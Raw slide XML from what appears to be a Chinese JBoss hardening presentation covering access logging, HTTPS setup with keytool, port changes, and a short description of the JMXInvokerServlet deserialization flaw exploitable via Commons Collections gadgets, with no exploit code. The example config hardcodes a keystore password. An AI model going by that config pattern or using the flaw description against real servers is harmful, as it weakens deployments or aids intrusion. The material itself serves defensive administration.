            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1362075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pattern="%{X-Real-IP}i %a %l %u %D %t %r %s %b %{Referer}i %{User-Agent}i"  directory="${jboss.server.home.dir}/../logs" resolveHosts="false"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/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="16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这里</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的路径可以更改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directory="${jboss.apphome.dir}/logs“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57834" marR="9067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jboss.apphome.dir</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>这个变量必须要到</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>jbossctl</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>里去定义，加到</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JAVA_OPTS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>里面去</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>：  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JAVA_OPTS="${JAVA_OPTS}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-Djboss.apphome.dir=$BASE_HOME"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43871" y="3811270"/>
            <a:ext cx="2548255" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2548254" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2548128" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254812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05840" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1005840" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1005840" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100584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823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设置通讯协议，开启</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>访问</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005839" y="1908048"/>
            <a:ext cx="8638540" cy="338455"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8638540" h="338455">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8638032" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8638032" y="338327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33832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522" y="1903679"/>
            <a:ext cx="8647430" cy="348615"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8647430" h="348614">
                <a:moveTo>
                  <a:pt x="8642096" y="348081"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="348081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="347853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="347167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="346113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="344792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="343319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642096" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="864685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38556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="338556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="343319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="343319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646629" y="344792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8645956" y="346113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8644902" y="347167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8643569" y="347853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642096" y="348081"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="34861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647430" h="348614">
                <a:moveTo>
                  <a:pt x="863733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637333" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8637333" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="348614">
                <a:moveTo>
                  <a:pt x="8637333" y="343319"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8637333" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642096" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="338556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642096" y="338556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8637333" y="343319"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="348614">
                <a:moveTo>
                  <a:pt x="8646858" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8642096" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8637333" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="348614">
                <a:moveTo>
                  <a:pt x="9525" y="343319"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="338556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="338556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="343319"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="348614">
                <a:moveTo>
                  <a:pt x="8637333" y="343319"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="343319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="338556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8637333" y="338556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8637333" y="343319"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="348614">
                <a:moveTo>
                  <a:pt x="8646858" y="343319"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8637333" y="343319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642096" y="338556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="338556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="34331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5839" y="3069335"/>
            <a:ext cx="8638540" cy="2308860"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8638540" h="2308860">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8638032" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8638032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1522" y="3064751"/>
            <a:ext cx="8647430" cy="2318385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8647430" h="2318385">
                <a:moveTo>
                  <a:pt x="8642096" y="2317851"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2317851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2317610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="2316937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="2315883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="2314562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642096" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="864685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308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646629" y="2314562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8645956" y="2315883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8644902" y="2316937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8643569" y="2317610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642096" y="2317851"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="231838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647430" h="2318385">
                <a:moveTo>
                  <a:pt x="863733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637333" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8637333" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="2318385">
                <a:moveTo>
                  <a:pt x="8637333" y="2313089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8637333" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642096" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642096" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8637333" y="2313089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="2318385">
                <a:moveTo>
                  <a:pt x="8646858" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8642096" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8637333" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="2318385">
                <a:moveTo>
                  <a:pt x="9525" y="2313089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2313089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="2318385">
                <a:moveTo>
                  <a:pt x="8637333" y="2313089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8637333" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8637333" y="2313089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="2318385">
                <a:moveTo>
                  <a:pt x="8646858" y="2313089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8637333" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642096" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="2313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481474"/>
            <a:ext cx="9474200" cy="43738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JDK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自带的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="9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keytool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工具生成一个证书</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457834">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="645"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JAVA_HOME/bin/keytool </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-genkey –alias tomcat –keyalg RSA -keystore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/path/to/my/keystore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939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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="6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server/$CONFIG/deploy/jbossweb-tomcat55.sar/conf/server.xml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配置文件，更改为使 用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https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方式，增加如下行：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457834" marR="32512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Connector classname=”org.apache.catalina.http.HttpConnector”  port=”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8443</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>” minProcessors=”5”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maxprocessors=”100”</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457834" marR="14465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enableLookups=”true” acceptCount=”10” debug=”0” scheme=”https” secure=”true” &gt;  Factory classname=”org.apache.catalina.SSLServerSocketFactory”  clientAuth=”false”</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457834" marR="3550920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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keystoreFile</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=”/path/to/my/keystore” keystorePass=”runway”  protocol=”TLS”/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="16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/Connector&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="16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</a:pPr>
            <a:r>
              <a:rPr sz="16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其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中</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="8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keystorePass</a:t>
            </a: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的值为生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成</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="9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keystore</a:t>
            </a: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时输入的密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码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重新启动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Jboss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75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修改</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>的访问端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005839" y="2228088"/>
            <a:ext cx="8638540" cy="1569720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8638540" h="1569720">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8638032" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8638032" y="1569719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="156971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22" y="2223541"/>
            <a:ext cx="8647430" cy="1579245"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8647430" h="1579245">
                <a:moveTo>
                  <a:pt x="8642096" y="1579194"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1579194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1578952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1578279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1577225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="1575892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1574431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642096" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="864685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569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1574431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="1574431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646629" y="1575892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8645956" y="1577225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8644902" y="1578279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8643569" y="1578952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642096" y="1579194"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="1579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647430" h="1579245">
                <a:moveTo>
                  <a:pt x="863733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637333" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8637333" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="1579245">
                <a:moveTo>
                  <a:pt x="8637333" y="1574431"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8637333" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642096" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642096" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8637333" y="1574431"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="1579245">
                <a:moveTo>
                  <a:pt x="8646858" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8642096" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8637333" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="1579245">
                <a:moveTo>
                  <a:pt x="9525" y="1574431"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1574431"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="1579245">
                <a:moveTo>
                  <a:pt x="8637333" y="1574431"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1574431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8637333" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8637333" y="1574431"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8647430" h="1579245">
                <a:moveTo>
                  <a:pt x="8646858" y="1574431"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8637333" y="1574431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642096" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8646858" y="15744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7723"/>
            <a:ext cx="9550400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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="6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server/$CONFIG/deploy/jbossweb-tomat55.sar/server.xml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配置文件，更改默认管理端 口到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8100</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457834" marR="3447415">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="825"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;Connector port="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8100</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>" address="${jboss.bind.address}"  maxThreads="250" strategy="ms" maxHttpHeaderSize="8192"  emptySessionPath="true"</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457834" marR="3390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enableLookups="false" redirectPort="8443" acceptCount="100"  connectionTimeout="1800"</a:t>
            </a:r>
            <a:endParaRPr sz="16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disableUploadTimeout="true" URIEncoding="utf-8"/&gt;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重启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JBOSS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-JBoss JMXInvokerServlet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>反序列化漏洞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CVE-2015-4852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这是经典的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JBoss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反序列化漏洞，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JBoss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/invoker/JMXInvokerServlet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请求中读取了用户传入的对象，然后我们利用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Apache Commons Collections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Gadget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执行任意代码。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这个洞使用的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gadgets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Apache Commons Collections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gadgets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同时也能被用于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WebSphere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JBoss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Jenkins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OpenNMS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2971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07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反序列化漏洞对</a:t>
            </a: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的影响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0" y="4004373"/>
            <a:ext cx="1188949" cy="290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防护：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839" y="1912620"/>
            <a:ext cx="10355580" cy="1569720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10355580" h="1569720">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10355580" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10355580" y="1569719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="156971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522" y="1908238"/>
            <a:ext cx="10365105" cy="1579245"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10365105" h="1579245">
                <a:moveTo>
                  <a:pt x="10360164" y="1579181"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1579181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1578952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="1578267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1577213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="1575892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1574419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10360164" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1036492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569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1574419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10364927" y="1574419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10364685" y="1575892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10364012" y="1577213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10362958" y="1578267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10361625" y="1578952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10360164" y="1579181"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10365105" h="1579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65105" h="1579245">
                <a:moveTo>
                  <a:pt x="1035540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55402" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10355402" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10365105" h="1579245">
                <a:moveTo>
                  <a:pt x="10355402" y="1574419"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10355402" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10360164" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10364927" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10364927" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10360164" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10355402" y="1574419"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10365105" h="1579245">
                <a:moveTo>
                  <a:pt x="10364927" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10360164" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10355402" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10364927" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10364927" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10365105" h="1579245">
                <a:moveTo>
                  <a:pt x="9525" y="1574419"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1574419"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10365105" h="1579245">
                <a:moveTo>
                  <a:pt x="10355402" y="1574419"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1574419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
